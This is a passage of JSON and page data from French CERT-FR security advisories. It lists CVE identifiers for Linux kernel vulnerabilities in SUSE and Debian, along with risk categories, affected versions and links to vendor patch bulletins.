"url": "https://www.cve.org/CVERecord?id=CVE-2023-54168"
},
{
"name": "CVE-2025-68327",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68327"
},
{
"name": "CVE-2022-50889",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50889"
},
{
"name": "CVE-2023-54146",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54146"
},
{
"name": "CVE-2025-68241",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68241"
},
{
"name": "CVE-2023-54118",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54118"
},
{
"name": "CVE-2023-54115",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54115"
},
{
"name": "CVE-2022-50699",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50699"
},
{
"name": "CVE-2022-49943",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49943"
},
{
"name": "CVE-2023-53990",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53990"
},
{
"name": "CVE-2023-54104",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54104"
},
{
"name": "CVE-2022-50870",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50870"
},
{
"name": "CVE-2023-54058",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54058"
},
{
"name": "CVE-2023-52874",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52874"
},
{
"name": "CVE-2025-68776",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68776"
},
{
"name": "CVE-2025-71066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71066"
},
{
"name": "CVE-2023-53417",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53417"
},
{
"name": "CVE-2026-22993",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22993"
},
{
"name": "CVE-2025-40044",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40044"
},
{
"name": "CVE-2025-71097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71097"
},
{
"name": "CVE-2023-54311",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54311"
},
{
"name": "CVE-2023-54183",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54183"
},
{
"name": "CVE-2023-54126",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54126"
},
{
"name": "CVE-2023-54326",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54326"
},
{
"name": "CVE-2023-54282",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54282"
},
{
"name": "CVE-2022-50697",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50697"
},
{
"name": "CVE-2022-50733",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50733"
},
{
"name": "CVE-2025-71111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71111"
},
{
"name": "CVE-2026-22985",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22985"
},
{
"name": "CVE-2023-54084",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54084"
},
{
"name": "CVE-2025-68802",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68802"
},
{
"name": "CVE-2023-54067",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54067"
},
{
"name": "CVE-2022-50731",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50731"
},
{
"name": "CVE-2023-54264",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54264"
},
{
"name": "CVE-2025-40331",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40331"
},
{
"name": "CVE-2025-68337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68337"
},
{
"name": "CVE-2023-54304",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54304"
},
{
"name": "CVE-2022-50851",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50851"
},
{
"name": "CVE-2025-21681",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21681"
},
{
"name": "CVE-2022-50615",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50615"
},
{
"name": "CVE-2025-71131",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71131"
},
{
"name": "CVE-2024-58020",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58020"
},
{
"name": "CVE-2022-50704",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50704"
},
{
"name": "CVE-2023-53747",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53747"
},
{
"name": "CVE-2022-50730",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50730"
},
{
"name": "CVE-2022-50617",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50617"
},
{
"name": "CVE-2023-54173",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54173"
},
{
"name": "CVE-2023-53751",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53751"
},
{
"name": "CVE-2023-53743",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53743"
},
{
"name": "CVE-2022-50656",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50656"
},
{
"name": "CVE-2025-71116",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71116"
},
{
"name": "CVE-2023-54036",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54036"
},
{
"name": "CVE-2023-54190",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54190"
},
{
"name": "CVE-2022-49604",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49604"
},
{
"name": "CVE-2023-53842",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53842"
},
{
"name": "CVE-2025-68362",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68362"
},
{
"name": "CVE-2022-50823",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50823"
},
{
"name": "CVE-2023-53412",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53412"
},
{
"name": "CVE-2022-50719",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50719"
},
{
"name": "CVE-2022-50703",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50703"
},
{
"name": "CVE-2022-50763",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50763"
},
{
"name": "CVE-2025-40300",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40300"
},
{
"name": "CVE-2022-50727",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50727"
},
{
"name": "CVE-2022-50629",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50629"
},
{
"name": "CVE-2022-50872",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50872"
},
{
"name": "CVE-2025-40280",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40280"
},
{
"name": "CVE-2025-71162",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71162"
},
{
"name": "CVE-2023-54127",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54127"
},
{
"name": "CVE-2025-68803",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68803"
},
{
"name": "CVE-2026-22996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22996"
},
{
"name": "CVE-2023-54197",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54197"
},
{
"name": "CVE-2023-54244",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54244"
},
{
"name": "CVE-2022-50865",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50865"
},
{
"name": "CVE-2026-22976",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22976"
},
{
"name": "CVE-2023-54319",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54319"
},
{
"name": "CVE-2025-68305",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68305"
},
{
"name": "CVE-2022-50845",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50845"
},
{
"name": "CVE-2022-50754",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50754"
},
{
"name": "CVE-2023-54140",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54140"
},
{
"name": "CVE-2022-50856",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50856"
},
{
"name": "CVE-2025-68775",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68775"
},
{
"name": "CVE-2025-71112",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71112"
},
{
"name": "CVE-2023-54055",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54055"
},
{
"name": "CVE-2023-54025",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54025"
},
{
"name": "CVE-2023-53991",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53991"
},
{
"name": "CVE-2022-50861",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50861"
},
{
"name": "CVE-2022-50882",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50882"
},
{
"name": "CVE-2023-54300",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54300"
},
{
"name": "CVE-2025-39880",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39880"
},
{
"name": "CVE-2023-54042",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54042"
},
{
"name": "CVE-2022-50832",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50832"
},
{
"name": "CVE-2022-50638",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50638"
},
{
"name": "CVE-2023-52525",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52525"
},
{
"name": "CVE-2023-54302",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54302"
},
{
"name": "CVE-2023-53811",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53811"
},
{
"name": "CVE-2023-54051",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54051"
},
{
"name": "CVE-2023-54286",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54286"
},
{
"name": "CVE-2023-54269",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54269"
},
{
"name": "CVE-2025-21765",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21765"
},
{
"name": "CVE-2023-53808",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53808"
},
{
"name": "CVE-2022-50849",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50849"
},
{
"name": "CVE-2025-68366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68366"
},
{
"name": "CVE-2024-53070",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53070"
},
{
"name": "CVE-2022-50760",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50760"
},
{
"name": "CVE-2023-54014",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54014"
},
{
"name": "CVE-2025-68815",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68815"
},
{
"name": "CVE-2022-50858",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50858"
},
{
"name": "CVE-2025-40215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40215"
},
{
"name": "CVE-2022-50888",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50888"
},
{
"name": "CVE-2025-71163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71163"
},
{
"name": "CVE-2024-36350",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36350"
},
{
"name": "CVE-2025-71096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71096"
},
{
"name": "CVE-2025-71099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71099"
},
{
"name": "CVE-2025-71095",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71095"
},
{
"name": "CVE-2022-50640",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50640"
},
{
"name": "CVE-2025-68771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68771"
},
{
"name": "CVE-2025-68363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68363"
},
{
"name": "CVE-2022-50747",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50747"
},
{
"name": "CVE-2026-22984",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22984"
},
{
"name": "CVE-2025-68303",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68303"
},
{
"name": "CVE-2025-40259",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40259"
},
{
"name": "CVE-2024-36349",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36349"
},
{
"name": "CVE-2023-53226",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53226"
},
{
"name": "CVE-2023-53827",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53827"
},
{
"name": "CVE-2025-68757",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68757"
},
{
"name": "CVE-2023-54293",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54293"
},
{
"name": "CVE-2022-50782",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50782"
},
{
"name": "CVE-2026-22977",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22977"
},
{
"name": "CVE-2022-50826",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50826"
},
{
"name": "CVE-2022-48853",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48853"
},
{
"name": "CVE-2022-50635",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50635"
},
{
"name": "CVE-2023-53746",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53746"
},
{
"name": "CVE-2023-54171",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54171"
},
{
"name": "CVE-2022-50749",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50749"
},
{
"name": "CVE-2022-50618",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50618"
},
{
"name": "CVE-2023-54218",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54218"
},
{
"name": "CVE-2025-71123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71123"
},
{
"name": "CVE-2022-50678",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50678"
},
{
"name": "CVE-2025-38684",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38684"
},
{
"name": "CVE-2025-71100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71100"
},
{
"name": "CVE-2025-68372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68372"
},
{
"name": "CVE-2026-23010",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23010"
},
{
"name": "CVE-2023-53850",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53850"
},
{
"name": "CVE-2025-38209",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38209"
},
{
"name": "CVE-2025-71137",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71137"
},
{
"name": "CVE-2023-53998",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53998"
},
{
"name": "CVE-2025-68301",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68301"
},
{
"name": "CVE-2026-23011",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23011"
},
{
"name": "CVE-2023-54242",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54242"
},
{
"name": "CVE-2025-40363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40363"
},
{
"name": "CVE-2023-53852",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53852"
},
{
"name": "CVE-2022-50777",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50777"
},
{
"name": "CVE-2025-71156",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71156"
},
{
"name": "CVE-2023-53862",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53862"
},
{
"name": "CVE-2026-22988",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22988"
},
{
"name": "CVE-2022-50664",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50664"
},
{
"name": "CVE-2023-50756",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50756"
},
{
"name": "CVE-2022-50643",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50643"
},
{
"name": "CVE-2025-68245",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68245"
},
{
"name": "CVE-2023-53254",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53254"
},
{
"name": "CVE-2023-54020",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54020"
},
{
"name": "CVE-2023-53996",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53996"
},
{
"name": "CVE-2023-52999",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52999"
},
{
"name": "CVE-2025-71120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71120"
},
{
"name": "CVE-2025-71119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71119"
},
{
"name": "CVE-2023-54130",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54130"
},
{
"name": "CVE-2022-50625",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50625"
},
{
"name": "CVE-2023-54012",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54012"
},
{
"name": "CVE-2025-37913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37913"
},
{
"name": "CVE-2024-44987",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44987"
},
{
"name": "CVE-2025-38539",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38539"
},
{
"name": "CVE-2025-40181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40181"
},
{
"name": "CVE-2023-54292",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54292"
},
{
"name": "CVE-2025-40132",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40132"
},
{
"name": "CVE-2022-50232",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50232"
},
{
"name": "CVE-2025-40258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40258"
},
{
"name": "CVE-2025-68798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68798"
},
{
"name": "CVE-2023-54294",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54294"
},
{
"name": "CVE-2023-53794",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53794"
},
{
"name": "CVE-2025-68178",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68178"
},
{
"name": "CVE-2022-50614",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50614"
},
{
"name": "CVE-2023-54050",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54050"
},
{
"name": "CVE-2022-50828",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50828"
},
{
"name": "CVE-2025-39813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39813"
},
{
"name": "CVE-2025-68819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68819"
},
{
"name": "CVE-2022-50670",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50670"
},
{
"name": "CVE-2022-50868",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50868"
},
{
"name": "CVE-2025-40261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40261"
},
{
"name": "CVE-2023-54287",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54287"
},
{
"name": "CVE-2025-68732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68732"
},
{
"name": "CVE-2022-50876",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50876"
},
{
"name": "CVE-2025-40323",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40323"
},
{
"name": "CVE-2025-68285",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68285"
},
{
"name": "CVE-2022-50652",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50652"
},
{
"name": "CVE-2022-50732",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50732"
},
{
"name": "CVE-2023-54198",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54198"
},
{
"name": "CVE-2022-50671",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50671"
},
{
"name": "CVE-2023-54047",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54047"
},
{
"name": "CVE-2022-50653",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50653"
},
{
"name": "CVE-2023-54252",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54252"
},
{
"name": "CVE-2023-54019",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54019"
},
{
"name": "CVE-2023-54123",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54123"
},
{
"name": "CVE-2023-54236",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54236"
},
{
"name": "CVE-2025-39829",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39829"
},
{
"name": "CVE-2025-71091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71091"
},
{
"name": "CVE-2022-50835",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50835"
},
{
"name": "CVE-2023-54189",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54189"
},
{
"name": "CVE-2025-68227",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68227"
},
{
"name": "CVE-2025-40339",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40339"
},
{
"name": "CVE-2023-54260",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54260"
},
{
"name": "CVE-2022-50884",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50884"
},
{
"name": "CVE-2023-54230",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54230"
},
{
"name": "CVE-2022-50786",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50786"
},
{
"name": "CVE-2025-68800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68800"
},
{
"name": "CVE-2025-68261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68261"
},
{
"name": "CVE-2023-54299",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54299"
},
{
"name": "CVE-2025-71149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71149"
},
{
"name": "CVE-2025-68767",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68767"
},
{
"name": "CVE-2023-53830",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53830"
},
{
"name": "CVE-2025-40142",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40142"
},
{
"name": "CVE-2022-50850",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50850"
},
{
"name": "CVE-2023-54219",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54219"
},
{
"name": "CVE-2025-68727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68727"
},
{
"name": "CVE-2023-53847",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53847"
},
{
"name": "CVE-2025-39836",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39836"
},
{
"name": "CVE-2023-54325",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54325"
},
{
"name": "CVE-2023-54121",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54121"
},
{
"name": "CVE-2022-50770",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50770"
},
{
"name": "CVE-2025-68264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68264"
},
{
"name": "CVE-2025-40087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40087"
},
{
"name": "CVE-2022-50755",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50755"
},
{
"name": "CVE-2025-68764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68764"
}
],
"initial_release_date": "2026-02-13T00:00:00",
"last_revision_date": "2026-02-13T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0170",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-02-13T00:00:00.000000"
}
],
"risks": [
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "D\u00e9ni de service"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de SUSE. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es, une atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es et un contournement de la politique de s\u00e9curit\u00e9.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de SUSE",
"vendor_advisories": [
{
"published_at": "2026-02-12",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0472-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260472-1"
},
{
"published_at": "2026-02-12",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0471-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260471-1"
},
{
"published_at": "2026-02-12",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0474-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260474-1"
},
{
"published_at": "2026-02-12",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0473-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260473-1"
},
{
"published_at": "2026-02-09",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0411-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260411-1"
},
{
"published_at": "2026-02-11",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0447-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260447-1"
},
{
"published_at": "2026-02-12",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0475-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260475-1"
}
]
}
CERTFR-2026-AVI-0166
Vulnerability from certfr_avis - Published: 2026-02-13 - Updated: 2026-02-13
De multiples vulnérabilités ont été découvertes dans le noyau Linux de Debian. Elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et un déni de service.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
References
| Title | Publication Time | Tags | ||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Debian trixie versions ant\u00e9rieures \u00e0 6.12.69-1",
"product": {
"name": "Debian",
"vendor": {
"name": "Debian",
"scada": false
}
}
},
{
"description": "Debian bookworm versions ant\u00e9rieures \u00e0 6.1.162-1",
"product": {
"name": "Debian",
"vendor": {
"name": "Debian",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-71075",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71075"
},
{
"name": "CVE-2025-71086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71086"
},
{
"name": "CVE-2025-22083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22083"
},
{
"name": "CVE-2025-71065",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71065"
},
{
"name": "CVE-2025-22107",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22107"
},
{
"name": "CVE-2025-71134",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71134"
},
{
"name": "CVE-2026-23098",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23098"
},
{
"name": "CVE-2025-68749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68749"
},
{
"name": "CVE-2025-71094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71094"
},
{
"name": "CVE-2025-68788",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68788"
},
{
"name": "CVE-2025-68778",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68778"
},
{
"name": "CVE-2026-23054",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23054"
},
{
"name": "CVE-2025-71064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71064"
},
{
"name": "CVE-2026-23072",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23072"
},
{
"name": "CVE-2025-68725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68725"
},
{
"name": "CVE-2025-68795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68795"
},
{
"name": "CVE-2025-68349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68349"
},
{
"name": "CVE-2025-38104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38104"
},
{
"name": "CVE-2025-68380",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68380"
},
{
"name": "CVE-2026-23069",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23069"
},
{
"name": "CVE-2023-53421",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53421"
},
{
"name": "CVE-2026-22992",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22992"
},
{
"name": "CVE-2025-71071",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71071"
},
{
"name": "CVE-2025-71191",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71191"
},
{
"name": "CVE-2025-68728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68728"
},
{
"name": "CVE-2025-68364",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68364"
},
{
"name": "CVE-2025-71087",
